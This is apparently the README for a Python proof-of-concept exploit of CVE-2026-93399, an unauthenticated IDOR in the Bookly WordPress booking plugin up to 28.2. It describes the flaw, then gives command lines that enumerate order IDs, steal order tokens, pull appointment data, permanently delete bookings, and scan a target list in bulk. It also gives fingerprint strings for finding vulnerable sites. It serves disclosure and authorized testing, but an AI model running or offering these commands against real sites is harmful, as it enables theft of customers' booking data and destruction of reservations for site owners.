
PoC en Python para CVE-2026-93399, un IDOR no autenticado en Bookly <= 28.2 que filtra tokens de pedidos, expone citas y revierte reservas.
PoC en Python 3 para CVE-2026-93399 en Bookly (bookly-responsive-appointment-booking-tool).
CVE-2026-93399 — Bookly ≤ 28.2 padece una Referencia Directa a Objeto Insegura (CWE-639) en el AJAX público de reservas: bookly_get_form_id almacena el order_id controlado por el atacante en la sesión del formulario, y bookly_render_complete devuelve el token secreto bookly_order de ese pedido sin verificar que la sesión haya creado el pedido. Atacantes no autenticados pueden enumerar IDs de pedidos, robar tokens, extraer datos de citas mediante bookly_add_to_calendar, y cancelar/eliminar reservas no completadas con bookly_rollback_order. CVSS 3.1: 9.1 Crítico (C:N/I:H/A:H). Corregido en > 28.2.
Página del PoC: https://pocbit.org/pocs/cve-2026-93399
Índice del catálogo: https://pocbit.org/pocs/
pip install -r requirements.txt
python poc.py -u https://site.example --mode check
python poc.py -u https://site.example --mode check --order-id 15
python poc.py -u https://site.example --mode check --order-start 1 --order-end 30
python poc.py -u https://site.example --mode exploit --order-id 15 --calendar
python poc.py -u https://site.example --mode exploit --order-id 15 --rollback --confirm-delete
python poc.py --list targets.example.txt --mode check -j 10 --order-start 1 --order-end 5
body="/wp-content/plugins/bookly-responsive-appointment-booking-tool/"
body="bookly_get_form_id"
Solo pruebas autorizadas. --rollback --confirm-delete elimina reservas de forma permanente.